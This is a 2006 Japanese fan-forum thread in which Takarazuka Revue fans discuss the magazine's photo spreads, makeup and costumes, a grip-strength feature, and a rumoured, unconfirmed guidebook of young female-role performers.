139 :名無しさん@花束いっぱい。:2006/12/21(木) 19:28:30 ID:u66Axk26
何だか、かなみん特集号にみえた。
広告も含めて、かなみんがいっぱいって感じ。

140 :名無しさん@花束いっぱい。:2006/12/21(木) 19:30:20 ID:hKOvueL+
>>129
この二人が一番でしょうって言ったあとに「他のコンビが来るたびに同じこといいますから」
ちゃんとリップサービスだって言ってるのに、なに怒ってるの?

141 :名無しさん@花束いっぱい。:2006/12/21(木) 19:42:43 ID:5D56yef7
かなみんの髪の毛綺麗だね。
背中もとっても奇麗になって・・・胸元もちょっとドキドキ。
麻ちゃんともいい雰囲気で素敵。


142 :名無しさん@花束いっぱい。:2006/12/21(木) 19:51:05 ID:HoV+ej8t
これが舞台に乗ると・・・

143 :名無しさん@花束いっぱい。:2006/12/21(木) 19:54:34 ID:hhilVfKs
あんな綺麗な子を抱いてる麻子に嫉妬w

144 :名無しさん@花束いっぱい。:2006/12/21(木) 20:14:27 ID:eFmMRSca
寝言は寝て言え<143

145 :名無しさん@花束いっぱい。:2006/12/21(木) 20:16:00 ID:UcKhAFpk
そーいえば、某アングラビアンサイトで
自称かなみファンがあさかなは リアルビアンカポと紹介していた。
両者のファンも認めているとグラフのポート付きで力説してるし
そこの一般ビアン住人は大喜びして信じてるし・・・
ビアンの客が多少なりとも観に来るかもしれないが
いいのかそれで??って感じ。

146 :名無しさん@花束いっぱい。:2006/12/21(木) 20:34:38 ID:+/OSeDqS
あらら・・。

舞台になると微妙なんだよね…>あさかな

147 :名無しさん@花束いっぱい。:2006/12/21(木) 21:00:49 ID:5D56yef7
何が言いたいんだか・・・
変な人。。。

148 :名無しさん@花束いっぱい。:2006/12/21(木) 21:04:37 ID:iVudV+wo
どんな形にしろ客が少しでも増えるから良し!テカ

>>146
そーかな?微妙なんて感じた事皆無だわ。
ラブラブ感漂ってて、二人共も幸せそうだしイイ感じだと思うけど。

149 :名無しさん@花束いっぱい。:2006/12/21(木) 21:18:18 ID:Z2aWtLNj
>138
ん〜ボウリングは思いつかなかったけどw
腕に装着したレザーのカバーがハードで
なんか必殺仕事人みたいにみえたw

150 :名無しさん@花束いっぱい。:2006/12/21(木) 23:12:51 ID:8RKy0qR9
トンぎりスマソ。
なんかさぁ、トップ娘役5人とも華やかで嬉しい。
10年前の3人娘の頃みたいだー・゚・(つД`)・゚・  

151 :名無しさん@花束いっぱい。:2006/12/21(木) 23:15:01 ID:E5czH732
握力測るコーナー意味わからん。
意味わからんけど、組子全員を測定するから手間は大変そうだ。
とりあえず、麻華やる気ないやろw

152 :名無しさん@花束いっぱい。:2006/12/21(木) 23:35:42 ID:Qmtm826C
あさかなって就任当初は、似合わない、姉さん女房だ、あさこが尻に
引かれてるって良く言われていたけど
二人の良さが出てきたと思う。

あさこが成長したのか
かなみが寄り添い系に徹してるのか・・
まあ、お正月公演を楽しみにしているよ。

153 :名無しさん@花束いっぱい。:2006/12/21(木) 23:51:17 ID:iVudV+wo
やっぱり私生活でも幸せだからじゃない?<あさかな
愛し合ってるコンビっていいよね。


154 :名無しさん@花束いっぱい。:2006/12/21(木) 23:55:42 ID:8bLkyb0i
>151
あれって、今年トップ2番手の握力測定してたのが好評だったから?かと思ったよ。

155 :名無しさん@花束いっぱい。:2006/12/22(金) 00:00:49 ID:ZRpzdU6l
握力より伏臥上体反らしや前屈の数値を知りたいと思うのは
マニアックすぎでしょうか…

156 :名無しさん@花束いっぱい。:2006/12/22(金) 00:21:22 ID:nWIUG4UK
グラフのメール便配達の遅れ・・本当に申し訳ない・・。ごめんなさい。
全ヤ○ト社員に代わって心からお詫びします。
12月は・・お歳暮に追われて
休みもとれず、朝早くから夜おそくまで配達走りまわってても終わらない・・。

早く見たい心情はものすごくわかるので宝塚グラフが来たら早く届けてあげてと
仲間にお願いしました。

一ヤ○トドライバーの宝塚ファンより


157 :名無しさん@花束いっぱい。:2006/12/22(金) 00:45:00 ID:THzkXeMk
>156
お疲れ様です。
そっか、やっぱり12月は超大変なんだね。道も混んでるし。
通販で年内に届けてもらおうかなって思ったのがあるんだけど
年明け落ち着いてからにしときます。
どうぞ安全運転で。お身体大事にして下さいね。


158 :名無しさん@花束いっぱい。:2006/12/22(金) 00:50:43 ID:9QkUFswP
握力測定、それこそ組本でやればいいのに。

といいつつ、ポカリを買う私w

159 :名無しさん@花束いっぱい。:2006/12/22(金) 01:01:18 ID:nWIUG4UK
157さんありがとう。読んでいて泣きそうになっちゃいました。

ここでグラフが届かないっていうレスを見るたびに、
申し訳ないなとほんとに心が痛みます。みなさんごめんなさい。

そんな日々の中で唯一の励みが宝塚です私の場合。
みんながんばってるから私もがんばらなきゃって。

すっごいスレ違いごめんなさい。

160 :名無しさん@花束いっぱい。:2006/12/22(金) 05:24:42 ID:gLVOlYoN
>>136
そうか
ありがとう

161 :名無しさん@花束いっぱい。:2006/12/22(金) 12:14:20 ID:qqO+7TS1
>159タン
師走は忙しいだろうが、ガンガレ〜!

昨日やっとGRAPH購入したが、
その先のユミコのコーナー意味わかんなくてスキだww力の抜け具合がバロスww

握力測定は意味わからな杉。月ファンだが別に読んで楽しくもない…
そういえば組本そろそろ出ないかな。あさきりうひが揃ってる組本が欲しい…

162 :名無しさん@花束いっぱい。:2006/12/22(金) 13:23:38 ID:rzGThDhJ
成人女性の平均握力が30キロ前後だから、
やっぱり男役って力持ちが多いんだね。

163 :名無しさん@花束いっぱい。:2006/12/22(金) 13:26:59 ID:gLVOlYoN
みりお男役のくせに握力ないね

164 :名無しさん@花束いっぱい。:2006/12/22(金) 15:27:20 ID:pA1voI9D
あれ?もう発売日すぎたっけ?
定期購読の方の語らい?

165 :名無しさん@花束いっぱい。:2006/12/22(金) 15:36:36 ID:6k1TmWTr
>164タン、
過ぎてるよ〜20日発売。
関西ならもう阪急のキオスクで買えるよ〜

今は関西に住んでるんだが、
歌劇グラフどころかスタカレまでキオスクで売っててびびった地方出身の俺ww

166 :名無しさん@花束いっぱい。:2006/12/22(金) 16:46:49 ID:hkPKsBa0
アサコ地味過ぎでしょ。トップオーラ皆無だね
痩せてから老けたし、オバチャン臭い顔なんとかならないのかな
華やかさが欲しい

167 :名無しさん@花束いっぱい。:2006/12/22(金) 16:58:14 ID:FMpc3mWS
グラフ見た。
あさかな、何て微妙なんでしょう。
かなみのドレスが身体に合ってなくて、綺麗なドレスも綺麗じゃなく見える。
身体も然り。これは合わない衣装を用意した側の問題。
あんなガバガバドレス、着せられた方は気の毒。服のサイズって大事なのに・・・

こういうショットはファッション誌専門のカメラマンがいいんだよね。
気の利くアシスタントが居たら、ドレスの浮きもテープとか使って
上手く直してから撮影出来るのに。兎に角かなみが気の毒。
あと二人共表情が・・・何であんな顔の物を選んだのか?謎。
もしかして紀信と相性悪いのかも??
しかし、かなみ貫禄満点だね。どれも表情が野暮ったく見えるのは
大きな顔と腫れぼったい目元の所為かな?小さな顔だったら良かったのにね。



168 :名無しさん@花束いっぱい。:2006/12/22(金) 17:00:34 ID:+4ibNlVL
グラフのメイクさんはアサコの顔に合わないんだな。
毎年表紙を見るたびに「なんか違うんだよな・・・」と呟いてる(笑)
ま、本人メイクも時々外してますが。
「口紅が薄いとダメなんだよーーーあんたの顔は!」と言ってやりたい。



169 :名無しさん@花束いっぱい。:2006/12/22(金) 17:08:08 ID:NdGsBHeS
トップになった時のだったかな、薄紫系のスーツで笑顔の・・・・
あれは柔らかい感じで結構好きだった>麻子。
後は、紀信メイクと相性悪いのかイマイチな様な。
表情によっては、悪くないのもあるんだが・・・。
口紅もだが、細すぎる眉も似合わないと思う。

かなみんは二重で目も大きいけど、ちょっと眠たげな目だよね。

170 :名無しさん@花束いっぱい。:2006/12/22(金) 17:10:00 ID:FMpc3mWS
そーいえば麻子のポーズって前のグラフ表紙の時の
ショットっと丸っきり同じじゃない?
飛んでるのと寝転がってるの。何だかつまらなく感じるのはその所為か?
(相変わらずの太股ムチムチ具合はいいんだけどねw)

171 :名無しさん@花束いっぱい。:2006/12/22(金) 17:50:51 ID:/xpiqUsY
紀信表紙のメイク担当の人、メリハリのないメイクだから
顔が薄い人には向かないメイクだね。
理事、水、かし、わたる、娘役は良いけど、オサ、麻、コム
などはちょっと変。
でも、今月の麻子のピーターパン、かなみが背中だしてるコンビ
ポートは素敵だと思ったよ。

172 :名無しさん@花束いっぱい。:2006/12/22(金) 18:00:33 ID:pA1voI9D
>165タソ
ありがとー。
ご贔屓退団に伴ってモバイルタカラヅカ解約してたり
忙しくて忘れてた。

受験勉強の息抜きに、塾帰りに本屋だー!!

173 :名無しさん@花束いっぱい。:2006/12/22(金) 18:12:20 ID:9FclGbH8
赤いドレスのあさかなショットは
「俺、誘われてる?乗る?はぐらかす?どーする俺!?」
って感じだ。(ライフカードCM風につづーく)

全体的に普通のパーティーみたいで正月っぽくないね。
オサはお貴族風椅子に座ったほうが・・・

ゆみこはジーンズ似合うな。腰の細さが羨ましい。
タニの持ち物がいちいち可愛いw
柔軟うめ可愛いーーー!

174 :名無しさん@花束いっぱい。:2006/12/22(金) 18:59:44 ID:eUN1E2Mb
コムも今まで「いったい何の恨みが?」って思うくらい
メイクも服もいけてなかった
全体的にセンス悪いからスタイリスト変えた方がいいと思う

175 :名無しさん@花束いっぱい。:2006/12/22(金) 18:59:53 ID:k3d/nQfh
そんなにあさこって地味か?
かっこいいじゃん。男前だよ。
あさかな綺麗なコンビでいいと思うけどなあ〜
皆さんハードル高いのね・・・
トップのオーラも出てるよ。

176 :名無しさん@花束いっぱい。:2006/12/22(金) 19:02:32 ID:QIKW+oBC
>>175
折角の素材がメイクダウン、ドレスダウンしちゃって
勿体無いって事だよ。スタイリスト&ヘアメイク変更キボン!

177 :名無しさん@花束いっぱい。:2006/12/22(金) 21:11:29 ID:pA1voI9D
くそっ本屋になかったぜorz

あーもう我慢してたのに
明日キャトル行っちゃおうかな

178 :名無しさん@花束いっぱい。:2006/12/22(金) 21:23:19 ID:zYIZ1HkD
あさかなグラビア、初めてかなみんはキレイだなあと思い、あさこはいけてないと
思ったよ。いつからあんなにイモっぽくなっちゃったの?悲しい。

179 :名無しさん@花束いっぱい。:2006/12/22(金) 21:42:39 ID:yF6RkkQH
>178
私はあさこはカコイイと思ったけど、みほこはイマイチだな…。
お正月ポートとか"篠山話に花が咲く"に載ってる写真
のほうが可愛い。

180 :名無しさん@花束いっぱい。:2006/12/22(金) 22:29:50 ID:ULWm1gzX
1月号の娘役ポート、華やかで良いね。あすかは宝塚の娘役っぽく
ないね。なんかお天気のお姉さん的な雰囲気がある。
アサカナポートは退廃的で良いね。色々アンチに言われてるが
やはりお似合いだなー。いいコンビだよ。篠山話のショットはどれも
仲の良さがあふれていて可愛いね。
来月のかしるいも凄く楽しみー。どのコンビも自分達こそ一番ってな
感じでやってほしいな。トウアスにも期待。

181 :名無しさん@花束いっぱい。:2006/12/22(金) 22:34:47 ID:xmNmNVR/
>>180
ネガティブな意見を何故全てアンチの仕業と決め付けるの?
真っ当な意見も多々あるのに。
これだから嫌なの。<厨

182 :名無しさん@花束いっぱい。:2006/12/22(金) 22:42:49 ID:yPfXyz1b
>180
今の娘役トップの面々大好き〜
みんな綺麗or可愛いし、服のセンスも好き。
トップ娘役5人で写真集出してほしい

183 :名無しさん@花束いっぱい。:2006/12/22(金) 22:56:45 ID:9QkUFswP
あすかの服はるいるいが着てそうだ・・・って思ったら、なんか皆、5人でシャッフルしたみたい。前のページへ一人ずつずらしていくとぴったりな気が。

184 :名無しさん@花束いっぱい。:2006/12/22(金) 23:02:13 ID:ULWm1gzX
>181

>ネガティブな意見を何故全てアンチの仕業と決め付けるの?

だってアンチでしょ?情報スレ見たけど。アンチにいわれてもなぁw


185 :名無しさん@花束いっぱい。:2006/12/22(金) 23:25:00 ID:BQ5/GVLA
>175
美人だけど地味な人がいるように
格好良くても地味な人はいる。
アサコはそのタイプだとオモ。
だから存在感が薄い・・・

186 :名無しさん@花束いっぱい。:2006/12/22(金) 23:36:02 ID:kn3sOF3I
べつに地味とはおもわんなぁ
派手とも思わないが

187 :名無しさん@花束いっぱい。:2006/12/22(金) 23:40:27 ID:IpLiTYi1
感じ方なんか人それぞれなんだって。100人居たら100の感性・意見がある。
勝手に思うのは結構。でも自分の意見を押し付けるのはNG。
人の意見はサラっと聞き流すのが吉。



188 :名無しさん@花束いっぱい。:2006/12/22(金) 23:41:44 ID:9QkUFswP
豚切りスマソ
らぎ、Tシャツにも辞世の句がw

189 :名無しさん@花束いっぱい。:2006/12/22(金) 23:59:23 ID:bKNEFV0h
宙娘1がるいるい→ウメに変わったら、
更に華やかで可愛くて服のセンスもいい娘1勢揃いになるね。


190 :名無しさん@花束いっぱい。:2006/12/23(土) 00:30:24 ID:fkJS5Zar
ウメの服のセンスはありえない。
娘1の中で一人浮くよ。ただでさえ、娘役らしくないのに。


191 :名無しさん@花束いっぱい。:2006/12/23(土) 00:55:03 ID:aEcwyz0+
ウメは今のままで良いと思うなー。

192 :名無しさん@花束いっぱい。:2006/12/23(土) 01:04:07 ID:fh5PCSP3
あさこの笑顔はまだまだ少年系があっていいよ。
私的には地味とは思わないしかっこいいと思う。
ポートのあさかな結構嵌っているよ(仲良しコンビ)
今年からはトップコンビのポートが掲載?
来月はかしるいで残り、おさあや、みずとな、とうあす、たにうめ。
後の号はどうなるんだろう・・


193 :名無しさん@花束いっぱい。:2006/12/23(土) 03:51:02 ID:0o7+GkeY
今号のグラフ、何よりマメに驚かされた・・・
河本次長を男前にしたみたいだ・・・
いつの間にこんなに男らしくなってたんだろう・・・
少しポッとなりました。 次号が楽しみwktk
こんなにときめいてる自分、おかしいんだろうか?

194 :名無しさん@花束いっぱい。:2006/12/23(土) 06:05:58 ID:DXS2MNRA
あさこファン必死

195 :名無しさん@花束いっぱい。:2006/12/23(土) 09:32:50 ID:slsRdxPy
オサさんの紹介ページ
ミツルは載ったのにメオは載らないんだね
まだ組子じゃないエリタンは載ってるのにぃ

196 :名無しさん@花束いっぱい。:2006/12/23(土) 09:59:32 ID:Y6AEubR8
>193
おかしくないよw
…私はマメが演出の斉藤君に見えたw

197 :名無しさん@花束いっぱい。:2006/12/23(土) 10:11:58 ID:pJLkur5t
>195
えりたんは元花だからでしょう。
めおちゃんは異動してもDC組だったし
語ることがないと思うけど。

198 :名無しさん@花束いっぱい。:2006/12/23(土) 17:08:52 ID:iIWf8HBE
>>187
だれも押し付けてないと思うが。

199 :名無しさん@花束いっぱい。:2006/12/23(土) 18:04:12 ID:FekWogO6
本屋4軒まわって全部ないんだけどorz
声に出して店員に聞く勇気がない…

表紙何色〜?5軒目にチャレンジ…

200 :名無しさん@花束いっぱい。:2006/12/23(土) 18:33:39 ID:ENl+FVMG
昔あった娘役カレンダー復活してほしいな。
ヤフオクで見て以来ほしくなった。
「みどり?(檀か風花なのだが…)グンゆりお花」時代のカレンダーで、
路線系娘役が10人で15人確かのっているはず。

今回はオサのポートの顔が何か可愛くてよかったwwww
娘役は一応皆良かった。るいるいが一番良かったかな。
かなみんは良いけれど、表紙直後とかの方がより良かったかな。
となみは華やか。ブラックが似合ってる。彩音は足細い!あすかは笑っているのが良いね。
今回はとなみの足が意外と太いのに驚いた。

マメはマジメに男に見える。コマはジャニ系に見えます。
コマかっけぇよ…。次回は杏ちゃんなのだが何の扮装か気になる。
竜馬とお竜とかだったりして。

トップを語るシリーズの月雪星宙はこんな感じかな?
月…ユウヒ・きりやん・あひ・園加・もりえ
雪…はまこ・ゆみこ・キム・ひろみ・かなめ
星…しい・すずみん・ゆかり・レオン・和
宙…蘭トム・ともちん・ほっくん・十・七
まぁ86期まではOKだよね。新公終了した人だし。

201 :名無しさん@花束いっぱい。:2006/12/23(土) 19:59:55 ID:1EevhNha
>200
檀ちゃんだった。2001年くらいじゃないかな。
花…あきちゃん、ふー、かなみん
月…あー、カノチカ、みえ
雪…まひる
星…そんちゃん
歌…あっこさん、あきよ
こんなかんじじゃなかったかなあ。
たしかまーちゃんは載ってなくてミリコやみこは退団した後だった。
まああんまり需要がなかったんだろうね…
私はニュージェネレーションの娘役版がほしい。

202 :名無しさん@花束いっぱい。:2006/12/23(土) 20:53:46 ID:ENl+FVMG
dクス。
やはり檀ちゃんか。
あっこさん以外は誰が出ているか分からなかった。
まひる以外は意外だ。本当にだれか分からなかったんだよね。
あー・かなみん・ふー・そんちゃんは意外だ。
あーちゃんが出ていたとは…。あのあーちゃんも路線バリバリの頃がなぁ…。

ニュージネの娘役ver.ほしいなぁ。

203 :名無しさん@花束いっぱい。:2006/12/23(土) 23:20:10 ID:d73Kj685
娘役スレに行けといわれそうだが・・・
上のカレンダー、ふーちゃんは載っててまーちゃんは載らなかったんだ。
ふーちゃんって下級生の頃から期待されていたんだね。
昔を知らなかったのでスマソ。

204 :名無しさん@花束いっぱい。:2006/12/24(日) 00:46:35 ID:/O8/OsyY
>203
逆。まーちゃんのほうが抜擢は早かった。研2〜4くらいに結構ヒロインやってたんだけど
それ以降はヒロインから遠ざかってた。
ふーちゃんは研5〜6で3回新公ヒロインがまわってきて
カレンダー発売がその時期だったからふーちゃんが入った…というかんじ。
そんちゃんもあっこさんもその年や前の年にバウヒロやってたし、あきちゃんは大型別格だった。
当時、雪の愛田芽久ちゃんが好きで、雪娘はまっぴーだけなんだから
載せてくれてもいいのに…と思ったんだが
ヒロインから遠ざかってたから仕方ないな…と思った記憶が。

205 :名無しさん@花束いっぱい。:2006/12/24(日) 00:54:18 ID:ia4CfaUo
>>196
まさか仲間がいるとは!!
サイトー君だと思って焦ったよw
つか、まじで男・・・!?<まめ

206 :名無しさん@花束いっぱい。:2006/12/24(日) 01:06:41 ID:/O8/OsyY
ちなみにあーちゃんは新公当時はうめやあいあい並の連続ヒロインだったよ。
WSS、黒い瞳、ノバ、ルナ、愛のソナタ…
まあタニのためにってかんじだったけどね。…スレ違いになってスマソ。
グラフの感想は……最後のページの醤油のCMの料理が美味しそう…w
あとハミダシショットの写真が大きくなってていい!

207 :名無しさん@花束いっぱい。:2006/12/24(日) 01:15:40 ID:GENilrOL
娘役ヤングスターガイド2の情報が某所に!(個人サイトなので真偽不明)

『Shines Fairies-輝く23の妖精-』
2007/3/3発売
掲載者
花…澪乃・華月・瞳・野乃・月野
月…夏月・麻華・玲実・蘭乃
雪…早花・大月・純矢・愛加
星…花・成花・羽桜・白妙・美春
宙…葉室・舞姫・愛花・千鈴・藤咲

88…夏月・麻華・花・早花・葉室
89…澪乃・華月・大月・純矢・成花・羽桜・舞姫・愛花
90…瞳・玲実・白妙・千鈴
91…野乃・愛加・藤咲
92…月野・蘭乃・美春

事実だったらかなり嬉しいのだが…

208 :名無しさん@花束いっぱい。:2006/12/24(日) 01:21:30 ID:gMi6Y+p+
となみの似てると言われるのは
大抵動物です(笑)というのにワロタ

209 :名無しさん@花束いっぱい。:2006/12/24(日) 01:32:54 ID:UdzdF/dJ
>208
同じくww

あのページみて、となみちょっと好きになった。
前よりちゃんと喋れるようになったよね。

210 :名無しさん@花束いっぱい。:2006/12/24(日) 09:38:19 ID:/O8/OsyY
>207
へ〜。まさにニュージェネレーションの娘役版?本当なら嬉しいが…
2や8のネタより信憑性ありそうだが、やや人選が気になるなあ…
・フェアリーズ全員っぽいのに華耀が入っていない(ただし退団の噂もあるからな…)
・新公でほんの少しとはいえイムさんの役やった妃宮が入っていない
・まだほとんど名の知れてないような子も入ってる
(特に研1の月野は成績も特別上じゃないし…)
真相はいかに。

211 :名無しさん@花束いっぱい。:2006/12/24(日) 10:31:50 ID:sAFrCK6v
>>207
本当だったら絶対に買うな〜。
でも、花・葉室が入るのか…?
月野は劇団押しが強そうだからあり得そう。

212 :名無しさん@花束いっぱい。:2006/12/24(日) 11:07:56 ID:d1cIEgsn
月野は可愛くて目立ってるしホープ娘役だよ。
りんか、ののみの方が何でなん〜〜??

213 :名無しさん@花束いっぱい。:2006/12/24(日) 11:18:16 ID:sAFrCK6v
というより、
花…澪乃・華月・瞳・野乃・月野
月…夏月・麻華・玲実・蘭乃
雪…早花・大月・純矢・愛加
星…花・成花・羽桜・白妙・美春
宙…葉室・舞姫・愛花・千鈴・藤咲

だと、月だけどうしても人員不足に見える。
ねねれみ以外に目立ったのが居ないからな…。
花は一応、バウ3番手とか新公ウメとかやっているし…。

214 :名無しさん@花束いっぱい。:2006/12/24(日) 11:26:52 ID:dT3vvhX+
花なんて娘役いる?と思ったら、花ののみか。苗字か。

215 :名無しさん@花束いっぱい。:2006/12/24(日) 14:22:33 ID:ZlCnesHy
>>207
それがでっち上げでも願望でもなければ、すごくない?
去年の3月3日に娘ヤンスタ出たばかりだよね 。
しかしそんなに下っ端(しかも確固たる抜擢のない曖昧ちゃん揃い)の本が果たしてどれだけ需要があるのか。

216 :名無しさん@花束いっぱい。:2006/12/24(日) 15:45:10 ID:sAFrCK6v
発売日の変更はあるんだろうね。
夏月・玲実・花は人数調整の為に集められた人のような
気がしてならない…。麻華はまだ分かる。
月野・蘭乃・美春はわかるけど。
あと、芽吹・妃宮は各組メンバー人数調整のため落ちたんじゃないの?
芽吹・妃宮が入らずに、上の3人が入るというのはねぇ…


217 :名無しさん@花束いっぱい。:2006/12/24(日) 19:24:14 ID:6KX3XGVm
熱烈対談のあすかのネイルが気になる
長過ぎて清潔感全く無い

218 :名無しさん@花束いっぱい。:2006/12/24(日) 21:39:22 ID:ij2x4Gb4
かしたん綺麗だわ〜
www.amazon.co.jp/gp/product/images/B000M2DKT4

219 :名無しさん@花束いっぱい。:2006/12/25(月) 00:56:45 ID:C0/yc0BY
ごめん、細かいんだが、花の「野乃」は正しくは「野々」ね。

220 :名無しさん@花束いっぱい。:2006/12/25(月) 01:32:16 ID:1qYXbnS2
今月号のジェンヌ酷すぎ
字が高校生並に汚い…
せめて字くらいペン習字やれよ

221 :名無しさん@花束いっぱい。:2006/12/25(月) 09:37:22 ID:1uy2PGoy
男役若手本がウン年ぶりかで出るのに、娘ヤンスタが二年続けて出るかな?
今年の売れ行きで味をしめたんだろうか。

222 :名無しさん@花束いっぱい。:2006/12/25(月) 11:28:59 ID:z7CZmplN
>220
(●▽●)の字はしってる?

223 :名無しさん@花束いっぱい。:2006/12/25(月) 11:29:52 ID:YMFic98z
もうこうなったら、路線非路線うんぬんで載せるのではなく、下級生限定のカワユイ娘役オンリーのスタガイドでも作ってくれよw歌劇団。
人選がビミョンすぎ

224 :名無しさん@花束いっぱい。:2006/12/25(月) 11:30:57 ID:4obgXIok
>>221
今年のヤンスタ結構売れたの?

225 :名無しさん@花束いっぱい。:2006/12/25(月) 12:20:10 ID:0udyLoKJ
>>213
欲しいという気持ちにならない面子だ・・・。
前回の娘本は興味を引かれる娘役ばかりで、それでも買おうか迷ったのに。

娘本は、綺麗・可愛い・オシャレ、そのいずれか一つでいいからあてはまる人が
どれだけ出ているかで買うか判断するから。

226 :名無しさん@花束いっぱい。:2006/12/25(月) 12:43:46 ID:z7CZmplN
ニュージェネって阪○ブックスから予約できるのかな…

227 :名無しさん@花束いっぱい。:2006/12/25(月) 14:44:03 ID:lDT+sd/A
娘役本本当ならウレシイが、雪のゆりんが入ってないのが結構ショックだ・・・。
せーこが転向した分落ちたんだろうけど・・・・。
せーこも好きだけど複雑(´・ω・`)

228 :名無しさん@花束いっぱい。:2006/12/25(月) 17:12:17 ID:4obgXIok
うわさの娘役本は組で何人〜何人ってしなければ、
花夏・妃宮あたりは入ったんじゃないの?
さあや・コロあたりはスペシャル対談があるためになし…?
ふじこもいればなぁ…。

229 :名無しさん@花束いっぱい。:2006/12/25(月) 20:45:00 ID:+apRmBPV
カシちゃん(;_;)

230 :名無しさん@花束いっぱい。:2006/12/26(火) 10:06:59 ID:JkrXFunf
ニュージェネ発売日〜♪

231 :名無しさん@花束いっぱい。:2006/12/26(火) 16:50:59 ID:SOAvXgsA
ニュージェネ本ゲット!!贔屓がたくさんでてたわ

232 :名無しさん@花束いっぱい。:2006/12/26(火) 16:53:50 ID:vzojuecP
ニュージェネほしいよ〜!
歌劇にのってる取り扱い書店なら売ってるかな…?

233 :名無しさん@花束いっぱい。:2006/12/26(火) 17:32:28 ID:Uq0s3a8U
ニュージェネ買ったよ
ユミコも買ったよ

234 :名無しさん@花束いっぱい。:2006/12/26(火) 18:14:38 ID:7h2WhIHP
娘役本、集合日退団の澪乃が入っているからガセなのか、
澪乃の退団がそれほど急だったのか?

235 :名無しさん@花束いっぱい。:2006/12/26(火) 18:46:42 ID:hTsFP8s+
なっつ(夏月)はまだ分かるが、玲実は分からん。
スカフェになったのもおおいに謎だったが。
他にいないのか、月娘!

236 :名無しさん@花束いっぱい。:2006/12/26(火) 18:47:48 ID:ArgOzjjq
ゆみこPB、測量隊にワロタ。和ませてくれてありがたう・・・
ぱじゃまカワイイヨ♪

237 :名無しさん@花束いっぱい。:2006/12/26(火) 18:51:56 ID:6qw5X88n
すー子では無くてきらりんが入るんでしょうな。

劇団と阪急BOOK側のやりとりの予想

9月くらい?
阪急BOOKS「娘役ヤングスターガイド2を作ることになりましたので
掲載する生徒の選出をおねがいします。ただし、前回未掲載の
生徒で88期以降の21〜24人くらいで」 劇団「了解」

ここからが2通りに。
@
10月くらい
劇団「この24人で」 阪急BOOKS「了解」

12月半ば
劇団「華耀が退団することになったそうなので23人で」
阪急「了解です」

12月後半
劇団「すみません!華耀の退団は無しで、澪乃が退団します」
阪急「了解しました。ではこの22人で作ります」

A
10月
劇団「ではこの23名で」 阪急「了解」

12月半ば
劇団「華耀が退団することになりましたのでこの生徒を」 阪急「了解」

12月後半
劇団「澪乃退団に変更なので、追加生徒は変わらず、華耀を追加で」 阪急「了解」

238 :名無しさん@花束いっぱい。:2006/12/26(火) 19:05:53 ID:7h2WhIHP
>>237
なんできらりが辞める予定だったことが前提なんだよw

239 :名無しさん@花束いっぱい。:2006/12/26(火) 19:08:28 ID:GM8Jv996
>>237
よく分らんけど、バロスwww

240 :名無しさん@花束いっぱい。:2006/12/26(火) 19:35:25 ID:sPGOIV/y
ゆみこかわいいお。

ニュージェネ楽しいな。若手はキラキラしてていいわぁ。

241 :名無しさん@花束いっぱい。:2006/12/26(火) 19:51:13 ID:MiMIyIDh
結局ガセなんじゃね?娘本。
スカフェ経験者はほぼ全員入ってるのに(舞台でまだほとんど役がついてない子含め)
本役でもちょこちょこ役がついてるきらりんが入ってないのもおかしいし。
他の同期がいるわけでもないのに。

242 :名無しさん@花束いっぱい。:2006/12/26(火) 19:53:23 ID:MiMIyIDh
それからニュージェネ、なかなかいい!
集合写真の次の2ショットとか3ショットとかが可愛い。
ただ、同期トークや扮装は全員みたかったなあ。
扮装一人一人は無理でも、1組見開き2ページで1作品のコスプレするとか。

243 :名無しさん@花束いっぱい。:2006/12/26(火) 20:06:37 ID:GM8Jv996
PBどんな感じ?内容とか。
前みたいに元トップとの対談や、扮装ってあります?

244 :名無しさん@花束いっぱい。:2006/12/26(火) 20:29:03 ID:wcNFzArw
扮装はなし。ももさりとのダンスをしてるショットと
企画コーナーで花組若手(マラケシュの測量隊メンバー)登場あり。
対談は水と。過去のパーソナルシリーズの登場メンバーとの対談になるらしい。
しかし今後発売日時点で現役なのは
おさ、あさこ、水、とうこ、タニ、きりやん、ゆうひのみだからな…
接点があるのは
まとぶ→オサorとうこorタニ
とむ→オサorあさこ
キム→水orとうこ
レオン→とうこ
…ってかんじか。どうなるんだろ。

245 :名無しさん@花束いっぱい。:2006/12/26(火) 20:32:38 ID:wcNFzArw
あ、とむ→タニを追加。

パーソナルブック、1の時からなんとなく全員そろえてるから
今回もそろえる予定なんだが、
応募者サービス、写真とシールどちらかにしか応募できないのね…
しかも抽選でプレゼントの分も同じ応募券なのか…

246 :名無しさん@花束いっぱい。:2006/12/26(火) 20:39:30 ID:GM8Jv996
>>244-245
dです!
PB1じゃなくて2に近い内容なんだね。
対談相手が想像つかないな。

247 :名無しさん@花束いっぱい。:2006/12/26(火) 20:39:39 ID:4fLkYjSA
とむはオサ、あさこ、、ミズ、キリ、タニとは接点あるよ。

248 :名無しさん@花束いっぱい。:2006/12/26(火) 20:55:50 ID:3ydSaT1m
れおん、一応タニと共演してなかったか?1914出てたよね<タニ

249 :名無しさん@花束いっぱい。:2006/12/26(火) 20:57:52 ID:3ydSaT1m
連投スマソ
れおんはベルばらでオサあさ以外と接点ある。
キムはオサあさゆひきり以外。

250 :名無しさん@花束いっぱい。:2006/12/26(火) 21:02:38 ID:sFtuG5Ir
キムはベルばらでおさあさと接点あるんじゃ?
まんぼうでおさドレと写真写ってたよ。

251 :名無しさん@花束いっぱい。:2006/12/26(火) 21:05:25 ID:GM8Jv996
>>249
一応雪ベルで共演済みだけどね。
でもキムれおんは特出で共演したメンバーと学年が離れてるから、接点とは言い難いかも。

252 :名無しさん@花束いっぱい。:2006/12/26(火) 21:16:02 ID:sTXWTZ7z
水とゆみこだったって事は真飛はおさ、ちえはとうこかな?

253 :名無しさん@花束いっぱい。:2006/12/26(火) 21:22:45 ID:44BwshCb
キムはCSの番組でタニに憧れてるとか言ってなかった?
キム→タニもありえなくもない。

254 :名無しさん@花束いっぱい。:2006/12/26(火) 21:25:26 ID:705Rne1h
>>252
そうなるとキムはどうするんだろ。水が2回になるのかな。

255 :名無しさん@花束いっぱい。:2006/12/26(火) 21:27:01 ID:MiMIyIDh
ゆみこ→水は企画時点では組替えがわかる前だったみたいだよ。
なのであえて自組トップは外すかも。
まとぶ→とうこ
とむ→おさorあさこ
ただ、そうなるとキムとレオンはあまり親しそうな人がいないんだよね…

256 :名無しさん@花束いっぱい。:2006/12/26(火) 23:19:33 ID:GM8Jv996
そういえば刊行順どうなんだろう?

257 :名無しさん@花束いっぱい。:2006/12/26(火) 23:44:36 ID:pMPc3L8q
ちえは初舞台がノバボサだから、一応ゆうひ、きりやんとその辺りの話はできるのかな?
